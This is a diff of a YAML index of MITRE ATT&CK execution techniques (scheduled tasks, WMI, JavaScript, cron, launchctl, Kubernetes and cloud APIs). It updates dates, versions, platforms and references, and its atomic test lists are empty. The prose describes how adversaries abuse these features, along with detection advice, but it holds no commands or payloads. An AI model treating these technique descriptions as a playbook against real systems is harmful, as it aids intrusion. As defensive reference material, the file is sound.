@@ -24202,6 +24519,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24214,16 +24535,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24289,7 +24613,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24366,66 +24689,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24438,31 +24706,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24520,9 +24840,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -24614,20 +24933,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -24655,7 +24973,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -24675,33 +24993,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24718,6 +25016,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -24728,9 +25027,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -24738,8 +25041,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -24779,7 +25098,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -24804,12 +25123,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -24889,11 +25206,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -24953,12 +25269,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25056,9 +25371,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25075,19 +25390,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25096,7 +25410,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25133,11 +25447,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25174,11 +25487,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25197,13 +25509,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25282,12 +25593,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25298,6 +25608,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25308,16 +25619,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25348,14 +25659,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25421,39 +25729,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25462,6 +25744,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25474,19 +25757,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
